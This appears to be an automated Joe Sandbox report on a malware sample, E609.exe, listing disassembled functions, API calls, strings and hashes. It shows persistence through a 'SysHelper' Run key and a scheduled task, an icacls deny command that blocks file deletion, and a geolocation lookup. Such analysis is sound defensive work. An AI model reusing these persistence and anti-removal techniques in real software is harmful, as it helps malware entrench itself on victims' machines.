Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 797c63a7ccced013ca35a453a0dbe63bb9e39660a436ea53951fa57bdfbf598f
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 74519271E40249ABEF11DFA1DD45FEEBBB8EB48714F100129F906B6190E67479058BA4

Function 04A5208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 04A520C6
__invoke_watson.LIBCMT ref: 04A52120
_strlen.LIBCMT ref: 04A520D4

Part of subcall function 04A35BA8: __getptd_noexit.LIBCMT ref: 04A35BA8

_strnlen.LIBCMT ref: 04A5215F
__lock.LIBCMT ref: 04A52170
__getenv_helper_nolock.LIBCMT ref: 04A5217B

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: f94f04afffb4aabf425f4b402afc8dda39ee5484d2b514b3af99ad257438b556
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: FC31EC73A42215ABFB217F649F0076F67646F05B69F104095FD04EB1A0FB74F9408A91

Function 04A22670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A226DB
_memset.LIBCMT ref: 04A22A30
_memset.LIBCMT ref: 04A22AC0

Strings

D, xrefs: 04A22AC8

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: a0a9b6d2cf7bf16a68b2cdb69ec9603f7d705be86901528c7655006992cebdab
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 83E15E72D00229ABDF24DFA4DE49FEEB7B8BF04304F1440A9E509E6190EB74AA45DF54

Function 04A1D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A1D8EA

Strings

$, xrefs: 04A1DAE2
, xrefs: 04A1DADB
(, xrefs: 04A1DAE9

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 04d2018e81fbd9efafb604e07d0f3d1bddadf99ae2eccdaa8a2758cf50af9f2c
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: F491CE71D04218AAEF20CFA4CD49BEEBBB4AF05308F144169E406772D0DBB67A48CB65

Function 04A2A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A2A858
_memset.LIBCMT ref: 04A2A869
_memset.LIBCMT ref: 04A2A87A

Strings

p2Q, xrefs: 04A2A882

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: bf64c8f47678796b8d0c3d55826410c6742b2b8568121239751dbfbdf56627e2
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: 22F0ED78698750A5F7217750BD26B857E917B31B49F104088E1182E2E1E3FD338CA7AA

Function 04A5FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 04A5FBF1

Part of subcall function 04A4169C: std::exception::_Copy_str.LIBCMT ref: 04A416B5

__CxxThrowException@8.LIBCMT ref: 04A5FC06

Strings

TeM, xrefs: 04A5FBE7, 04A5FBFB
TeM, xrefs: 04A5FBFE

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 2a19475cb2feb944f4b1e13ba3059a3c3e23596e2b831735f8aa9b18527e104c
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 7ED067B5C0020CBBDB00EFA5D559CDDBBB8AB44348F408466A91497241EA74E7898B94

Function 04A1D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 04A3197D: __wfsopen.LIBCMT ref: 04A31988

_fgetws.LIBCMT ref: 04A1D15C

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: e9b7d646092de2995344ac7e5f75f58eb3bbfca67e6a2ded100bd5da9b00de4d
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 0991A172D00319ABEF21DFA4CD857EEB7B5BF04304F140529E815A7260E779BA14CB95

Function 04A1D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 04A1D77E
_malloc.LIBCMT ref: 04A1D7B2
_malloc.LIBCMT ref: 04A1D7C1
_fprintf.LIBCMT ref: 04A1D815

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 1ab710b7e4234bbac2cbd6a423e080ca0aa1d5f46dd796fba195c28629147b56
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 16A181B1C00248EBFF11EFE4DD45BDEBB75AF14309F140068E40676291E7B66A58CBA6

Function 04A32AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A32B2E
__read_nolock.LIBCMT ref: 04A32BFE
__filbuf.LIBCMT ref: 04A32C21
_memset.LIBCMT ref: 04A32C65

Part of subcall function 04A35BA8: __getptd_noexit.LIBCMT ref: 04A35BA8

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: b0db117f92f1cafc3074df7406097985b937e38411daf5226bc8a61eff2e7a6e
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: BC51B436B00305DBDB298F6989807AEB7B5AF50726F2487E9F835962D0F770B950CB50

Function 04A51359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 04A5137D

Part of subcall function 04A51A9D: __fltout2.LIBCMT ref: 04A51AC6

__cftog_l.LIBCMT ref: 04A513A3
__cftoe_l.LIBCMT ref: 04A513D5

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 88fbd9ddc5e08679be44f3bfa36d2f923f8971fc2e3b20b40c7c83c3ff7897c5
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B9014B7680014ABBCF525F84DE11DFE3F62BF19364F488515FE9958430D236E5B2AB81

Function 04AD7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 04AD7A4B

Part of subcall function 04AD8140: ___BuildCatchObjectHelper.LIBCMT ref: 04AD8172
Part of subcall function 04AD8140: ___AdjustPointer.LIBCMT ref: 04AD8189

_UnwindNestedFrames.LIBCMT ref: 04AD7A62
___FrameUnwindToState.LIBCMT ref: 04AD7A74
CallCatchBlock.LIBCMT ref: 04AD7A98

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: 2d58f8fe9c4991a2e7394e5cb46121b529238d95d95dbef68448b1e0ecb1e961
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 8501E976000109BBDF12AF55CE00EDA7BBAFF48758F158019FD1966120D736E9A1DBA0

Analysis Process: E609.exePID: 7048, Parent PID: 6956COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36%
Total number of Nodes:	833
Total number of Limit Nodes:	23

Executed Functions

Function 00419F90 Relevance: 178.3, APIs: 65, Strings: 36, Instructions: 1565COMMON

Download Yara Rule

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0055E270,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Program Files\Google\, xrefs: 0041B0EE
I:\5d2860c89d774.jpg, xrefs: 0041B32F
pU, xrefs: 00419FE6
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
<, xrefs: 0041A67B
--ForNetRes, xrefs: 0041A22E
IsNotAutoStart, xrefs: 0041A645
x2Q, xrefs: 0041A856
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
%username%, xrefs: 0041B283
C:\Windows\, xrefs: 0041AE0F
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
F:\, xrefs: 0041B397
--AutoStart, xrefs: 0041A2EC
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
X1P, xrefs: 0041A485
x*P, xrefs: 0041ACE4
--Admin, xrefs: 0041A1B4, 0041A632
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
D:\Program Files (x86)\Google\, xrefs: 0041B085
--Service, xrefs: 0041A30B
runas, xrefs: 0041A6CE
C:\Program Files\Google\, xrefs: 0041AFB9
D:\Windows\, xrefs: 0041AFF3
7P, xrefs: 0041B164
IsNotTask, xrefs: 0041A654
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
--Task, xrefs: 0041A2CD
IsAutoStart, xrefs: 0041A1D0, 0041A273
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
IsTask, xrefs: 0041A1EE, 0041A299
list<T> too long, xrefs: 0041B669, 0041B673

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$pU$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-2050406331
Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
PT5M, xrefs: 0040D5A1, 0040D66C
Time Trigger Task, xrefs: 0040D43C, 0040D973
--Task, xrefs: 0040D8DD
Author Name, xrefs: 0040D4C8
Trigger1, xrefs: 0040D6FA
2030-05-02T08:00:00, xrefs: 0040D737

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

Psapi.dll, xrefs: 0041228C
EnumProcessModules, xrefs: 0041226C, 004122A1
GetModuleBaseNameW, xrefs: 00412277, 004122AC
EnumProcesses, xrefs: 00412264, 00412299
kernel32.dll, xrefs: 0041224E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

Microsoft Internet Explorer, xrefs: 0040CF5A
https://api.2ip.ua/geo.json, xrefs: 0040CF79
"country_code":", xrefs: 0040CFE1

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
SHGetFolderPathW, xrefs: 00411E9F
" --AutoStart, xrefs: 00411DD1
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
Shell32.dll, xrefs: 00411E94
" --AutoStart, xrefs: 004120C2
icacls ", xrefs: 0041214C
SysHelper, xrefs: 00411D5B, 004120EB
D, xrefs: 00412128

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
String ID:
API String ID: 1503770280-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
